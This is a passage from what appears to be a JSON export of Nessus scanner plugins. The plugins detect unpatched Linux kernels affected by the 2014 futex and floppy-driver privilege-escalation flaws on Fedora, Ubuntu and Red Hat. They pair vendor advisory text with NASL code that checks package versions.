2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"kernel-3.14.6-200.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-23T18:54:05", "description": "Pinkie Pie discovered a flaw in the Linux kernel's futex subsystem. 
An\nunprivileged local user could exploit this flaw to cause a denial of\nservice (system crash) or gain administrative privileges.\n(CVE-2014-3153)\n\nA flaw was discovered in the vhost-net subsystem of the Linux kernel.\nGuest OS users could exploit this flaw to cause a denial of service\n(host OS crash). (CVE-2014-0055)\n\nSasha Levin reported a bug in the Linux kernel's virtual memory\nmanagement subsystem. An unprivileged local user could exploit this\nflaw to cause a denial of service (system crash). (CVE-2014-3122).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2014-06-06T00:00:00", "title": "Ubuntu 12.04 LTS : linux vulnerabilities (USN-2235-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3122", "CVE-2014-3153", "CVE-2014-0055"], "modified": "2014-06-06T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-virtual", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic-pae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-highbank", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-2235-1.NASL", "href": "https://www.tenable.com/plugins/nessus/74356", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2235-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(74356);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/22\");\n\n script_cve_id(\"CVE-2014-0055\", \"CVE-2014-3122\", \"CVE-2014-3153\");\n script_bugtraq_id(66441, 67162);\n script_xref(name:\"USN\", value:\"2235-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux vulnerabilities (USN-2235-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Pinkie Pie discovered a flaw in the Linux kernel's futex subsystem. An\nunprivileged local user could exploit this flaw to cause a denial of\nservice (system crash) or gain administrative privileges.\n(CVE-2014-3153)\n\nA flaw was discovered in the vhost-net subsystem of the Linux kernel.\nGuest OS users could exploit this flaw to cause a denial of service\n(host OS crash). (CVE-2014-0055)\n\nSasha Levin reported a bug in the Linux kernel's virtual memory\nmanagement subsystem. An unprivileged local user could exploit this\nflaw to cause a denial of service (system crash). (CVE-2014-3122).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2235-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Android \"Towelroot\" Futex Requeue Kernel Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-highbank\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/06\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2014-2020 Canonical, Inc. / NASL script (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2014-0055\", \"CVE-2014-3122\", \"CVE-2014-3153\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2235-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-64-generic\", pkgver:\"3.2.0-64.97\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-64-generic-pae\", pkgver:\"3.2.0-64.97\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-64-highbank\", pkgver:\"3.2.0-64.97\")) flag++;\nif 
(ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-64-virtual\", pkgver:\"3.2.0-64.97\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.2-generic / linux-image-3.2-generic-pae / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:14:40", "description": "Updated kernel packages that fix three security issues are now\navailable for Red Hat Enterprise Linux 6.2 Extended Update Support.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A flaw was found in the way the Linux kernel's futex subsystem\nhandled the requeuing of certain Priority Inheritance (PI) futexes. A\nlocal, unprivileged user could use this flaw to escalate their\nprivileges on the system. (CVE-2014-3153, Important)\n\n* A flaw was found in the way the Linux kernel's floppy driver handled\nuser space provided data in certain error code paths while processing\nFDRAWCMD IOCTL commands. A local user with write access to /dev/fdX\ncould use this flaw to free (using the kfree() function) arbitrary\nkernel memory. (CVE-2014-1737, Important)\n\n* It was found that the Linux kernel's floppy driver leaked internal\nkernel memory addresses to user space during the processing of the\nFDRAWCMD IOCTL command. A local user with write access to /dev/fdX\ncould use this flaw to obtain information about the kernel heap\narrangement. 
(CVE-2014-1738, Low)\n\nNote: A local user with write access to /dev/fdX could use these two\nflaws (CVE-2014-1737 in combination with CVE-2014-1738) to escalate\ntheir privileges on the system.\n\nRed Hat would like to thank Kees Cook of Google for reporting\nCVE-2014-3153, and Matthew Daley for reporting CVE-2014-1737 and\nCVE-2014-1738. Google acknowledges Pinkie Pie as the original reporter\nof CVE-2014-3153.\n\nAll kernel users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. The system\nmust be rebooted for this update to take effect.", "edition": 25, "published": "2014-11-08T00:00:00", "title": "RHEL 6 : kernel (RHSA-2014:0800)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1737", "CVE-2014-1738", "CVE-2014-3153"], "modified": "2014-11-08T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:redhat:enterprise_linux:kernel-firmware", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel", "cpe:/o:redhat:enterprise_linux:6.2", "p-cpe:/a:redhat:enterprise_linux:python-perf", "p-cpe:/a:redhat:enterprise_linux:perf", "p-cpe:/a:redhat:enterprise_linux:kernel-doc"], "id": "REDHAT-RHSA-2014-0800.NASL", "href": "https://www.tenable.com/plugins/nessus/79032", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0800. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79032);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-1737\", \"CVE-2014-1738\", \"CVE-2014-3153\");\n script_xref(name:\"RHSA\", value:\"2014:0800\");\n\n script_name(english:\"RHEL 6 : kernel (RHSA-2014:0800)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix three security issues are now\navailable for Red Hat Enterprise Linux 6.2 Extended Update Support.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A flaw was found in the way the Linux kernel's futex subsystem\nhandled the requeuing of certain Priority Inheritance (PI) futexes. A\nlocal, unprivileged user could use this flaw to escalate their\nprivileges on the system. (CVE-2014-3153, Important)\n\n* A flaw was found in the way the Linux kernel's floppy driver handled\nuser space provided data in certain error code paths while processing\nFDRAWCMD IOCTL commands. A local user with write access to /dev/fdX\ncould use this flaw to free (using the kfree() function) arbitrary\nkernel memory. (CVE-2014-1737, Important)\n\n* It was found that the Linux kernel's floppy driver leaked internal\nkernel memory addresses to user space during the processing of the\nFDRAWCMD IOCTL command. 
A local user with write access to /dev/fdX\ncould use this flaw to obtain information about the kernel heap\narrangement. (CVE-2014-1738, Low)\n\nNote: A local user with write access to /dev/fdX could use these two\nflaws (CVE-2014-1737 in combination with CVE-2014-1738) to escalate\ntheir privileges on the system.\n\nRed Hat would like to thank Kees Cook of Google for reporting\nCVE-2014-3153, and Matthew Daley for reporting CVE-2014-1737 and\nCVE-2014-1738. Google acknowledges Pinkie Pie as the original reporter\nof CVE-2014-3153.\n\nAll kernel users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. The system\nmust be rebooted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2014:0800\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-1737\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-1738\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-3153\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Android \"Towelroot\" Futex Requeue Kernel Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n 
script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/05/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6\\.2([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.2\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2014-1737\", \"CVE-2014-1738\", \"CVE-2014-3153\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2014:0800\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:0800\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-2.6.32-220.52.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-debug-2.6.32-220.52.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-2.6.32-220.52.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-debug-devel-2.6.32-220.52.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-debuginfo-2.6.32-220.52.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-2.6.32-220.52.1.el6\")) flag++;\n if 
(rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-devel-2.6.32-220.52.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", reference:\"kernel-doc-2.6.32-220.52.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", reference:\"kernel-firmware-2.6.32-220.52.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-headers-2.6.32-220.52.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"perf-2.6.32-220.52.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"perf-debuginfo-2.6.32-220.52.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"python-perf-2.6.32-220.52.1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-2.6.32-220.52.1.el6\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-debug / kernel-debug-debuginfo / kernel-debug-devel / etc\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:14:43", "description": "Updated kernel packages that fix three security issues and one bug are\nnow available for Red Hat Enterprise Linux 6.4 Extended Update\nSupport.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. 
Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A flaw was found in the way the Linux kernel's futex subsystem\nhandled the requeuing of certain Priority Inheritance (PI) futexes. A\nlocal, unprivileged user could use this flaw to escalate their\nprivileges on the system. (CVE-2014-3153, Important)\n\n* A flaw was found in the way the Linux kernel's floppy driver handled\nuser space provided data in certain error code paths while processing\nFDRAWCMD IOCTL commands. A local user with write access to /dev/fdX\ncould use this flaw to free (using the kfree() function) arbitrary\nkernel memory. (CVE-2014-1737, Important)\n\n* It was found that the Linux kernel's floppy driver leaked internal\nkernel memory addresses to user space during the processing of the\nFDRAWCMD IOCTL command. A local user with write access to /dev/fdX\ncould use this flaw to obtain information about the kernel heap\narrangement. (CVE-2014-1738, Low)\n\nNote: A local user with write access to /dev/fdX could use these two\nflaws (CVE-2014-1737 in combination with CVE-2014-1738) to escalate\ntheir privileges on the system.\n\nRed Hat would like to thank Kees Cook of Google for reporting\nCVE-2014-3153, and Matthew Daley for reporting CVE-2014-1737 and\nCVE-2014-1738. Google acknowledges Pinkie Pie as the original reporter\nof CVE-2014-3153.\n\nThis update also fixes the following bug :\n\n* A previous change that introduced global clock updates caused guest\nmachines to boot slowly when the host Time Stamp Counter (TSC) was\nmarked as unstable. The slow down increased with the number of vCPUs\nallocated. To resolve this problem, a patch has been applied to limit\nthe rate of the global clock updates. 
(BZ#1102253)\n\nAll kernel users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues. The system\nmust be rebooted for this update to take effect.", "edition": 27, "published": "2014-11-08T00:00:00", "title": "RHEL 6 : kernel (RHSA-2014:0900)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1737", "CVE-2014-1738", "CVE-2014-3153"], "modified": "2014-11-08T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x", "p-cpe:/a:redhat:enterprise_linux:kernel-firmware", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "cpe:/o:redhat:enterprise_linux:6.4", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel", "p-cpe:/a:redhat:enterprise_linux:perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel", "p-cpe:/a:redhat:enterprise_linux:python-perf", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:perf", "p-cpe:/a:redhat:enterprise_linux:kernel-doc", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-i686"], "id": "REDHAT-RHSA-2014-0900.NASL", "href": "https://www.tenable.com/plugins/nessus/79035", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0900. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79035);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-1737\", \"CVE-2014-1738\", \"CVE-2014-3153\");\n script_xref(name:\"RHSA\", value:\"2014:0900\");\n\n script_name(english:\"RHEL 6 : kernel (RHSA-2014:0900)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix three security issues and one bug are\nnow available for Red Hat Enterprise Linux 6.4 Extended Update\nSupport.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A flaw was found in the way the Linux kernel's futex subsystem\nhandled the requeuing of certain Priority Inheritance (PI) futexes. A\nlocal, unprivileged user could use this flaw to escalate their\nprivileges on the system. (CVE-2014-3153, Important)\n\n* A flaw was found in the way the Linux kernel's floppy driver handled\nuser space provided data in certain error code paths while processing\nFDRAWCMD IOCTL commands. A local user with write access to /dev/fdX\ncould use this flaw to free (using the kfree() function) arbitrary\nkernel memory. 
(CVE-2014-1737, Important)\n\n* It was found that the Linux kernel's floppy driver leaked internal\nkernel memory addresses to user space during the processing of the\nFDRAWCMD IOCTL command. A local user with write access to /dev/fdX\ncould use this flaw to obtain information about the kernel heap\narrangement. (CVE-2014-1738, Low)\n\nNote: A local user with write access to /dev/fdX could use these two\nflaws (CVE-2014-1737 in combination with CVE-2014-1738) to escalate\ntheir privileges on the system.\n\nRed Hat would like to thank Kees Cook of Google for reporting\nCVE-2014-3153, and Matthew Daley for reporting CVE-2014-1737 and\nCVE-2014-1738. Google acknowledges Pinkie Pie as the original reporter\nof CVE-2014-3153.\n\nThis update also fixes the following bug :\n\n* A previous change that introduced global clock updates caused guest\nmachines to boot slowly when the host Time Stamp Counter (TSC) was\nmarked as unstable. The slow down increased with the number of 